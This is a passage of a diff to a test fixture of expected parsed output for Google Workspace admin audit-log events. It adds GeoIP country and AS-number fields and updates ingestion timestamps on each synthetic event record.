"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_ALLOW_ADMIN_PASSWORD_RESET", @@ -1122,6 +1326,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1131,7 +1347,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915838700Z", + "ingested": "2021-12-14T14:44:24.297924441Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", "provider": "admin", "action": "ENABLE_API_ACCESS", @@ -1187,6 +1403,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1196,7 +1424,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915844500Z", + "ingested": "2021-12-14T14:44:24.297924778Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", "provider": "admin", "action": "AUTHORIZE_API_CLIENT_ACCESS", @@ -1251,6 +1479,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1260,7 +1500,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915850200Z", + "ingested": "2021-12-14T14:44:24.297925112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", "provider": "admin", "action": "REMOVE_API_CLIENT_ACCESS", @@ -1315,6 +1555,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1324,7 +1576,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915855800Z", + "ingested": "2021-12-14T14:44:24.297925442Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", "provider": "admin", "action": "CHROME_LICENSES_REDEEMED", @@ -1379,6 +1631,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1388,7 +1652,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915861500Z", + "ingested": "2021-12-14T14:44:24.297925843Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_AUTO_ADD_NEW_SERVICE", @@ -1443,6 +1707,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1452,7 +1728,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915867400Z", + "ingested": "2021-12-14T14:44:24.297926176Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "CHANGE_PRIMARY_DOMAIN", @@ -1507,6 +1783,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1516,7 +1804,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915873300Z", + "ingested": "2021-12-14T14:44:24.297926617Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_WHITELIST_SETTING", @@ -1572,6 +1860,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1581,7 +1881,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915879100Z", + "ingested": "2021-12-14T14:44:24.297926947Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "COMMUNICATION_PREFERENCES_SETTING_CHANGE", @@ -1637,6 +1937,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1646,7 +1958,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915884800Z", + "ingested": "2021-12-14T14:44:24.297927277Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_CONFLICT_ACCOUNT_ACTION", @@ -1701,6 +2013,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1710,7 +2034,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915890600Z", + "ingested": "2021-12-14T14:44:24.297927705Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_FEEDBACK_SOLICITATION", @@ -1766,6 +2090,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1775,7 +2111,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915896400Z", + "ingested": "2021-12-14T14:44:24.297928047Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_CONTACT_SHARING", @@ -1831,6 +2167,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1840,7 +2188,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915900600Z", + "ingested": "2021-12-14T14:44:24.297928380Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "CREATE_PLAY_FOR_WORK_TOKEN", @@ -1895,6 +2243,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1904,7 +2264,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915905300Z", + "ingested": "2021-12-14T14:44:24.297928742Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_USE_CUSTOM_LOGO", @@ -1960,6 +2320,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1969,7 +2341,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915910500Z", + "ingested": "2021-12-14T14:44:24.297929078Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CHANGE_CUSTOM_LOGO", @@ -2022,6 +2394,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2031,7 +2415,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915915800Z", + "ingested": "2021-12-14T14:44:24.297929483Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_DATA_LOCALIZATION_FOR_RUSSIA", @@ -2084,6 +2468,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2093,7 +2489,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915920600Z", + "ingested": "2021-12-14T14:44:24.297929839Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_DATA_LOCALIZATION_SETTING", @@ -2147,6 +2543,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2156,7 +2564,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915924200Z", + "ingested": "2021-12-14T14:44:24.297930182Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", "provider": "admin", "action": "CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO", @@ -2211,6 +2619,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2220,7 +2640,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915928800Z", + "ingested": "2021-12-14T14:44:24.297930623Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "DELETE_PLAY_FOR_WORK_TOKEN", @@ -2275,6 +2695,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2284,7 +2716,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915933200Z", + "ingested": "2021-12-14T14:44:24.297931028Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "VIEW_DNS_LOGIN_DETAILS", @@ -2339,6 +2771,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2348,7 +2792,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915938Z", + "ingested": "2021-12-14T14:44:24.297931357Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_DEFAULT_LOCALE", @@ -2403,6 +2847,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2412,7 +2868,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915942500Z", + "ingested": "2021-12-14T14:44:24.297931699Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_DEFAULT_TIMEZONE", @@ -2467,6 +2923,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2476,7 +2944,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915946900Z", + "ingested": "2021-12-14T14:44:24.297932033Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_NAME", @@ -2531,6 +2999,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2540,7 +3020,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915950700Z", + "ingested": "2021-12-14T14:44:24.297932357Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_ENABLE_PRE_RELEASE_FEATURES", @@ -2595,6 +3075,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2604,7 +3096,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915954800Z", + "ingested": "2021-12-14T14:44:24.297932819Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_SUPPORT_MESSAGE", @@ -2659,6 +3151,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2668,7 +3172,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915959500Z", + "ingested": "2021-12-14T14:44:24.297933157Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "ADD_TRUSTED_DOMAINS", @@ -2723,6 +3227,18 @@ "id": "1" }, 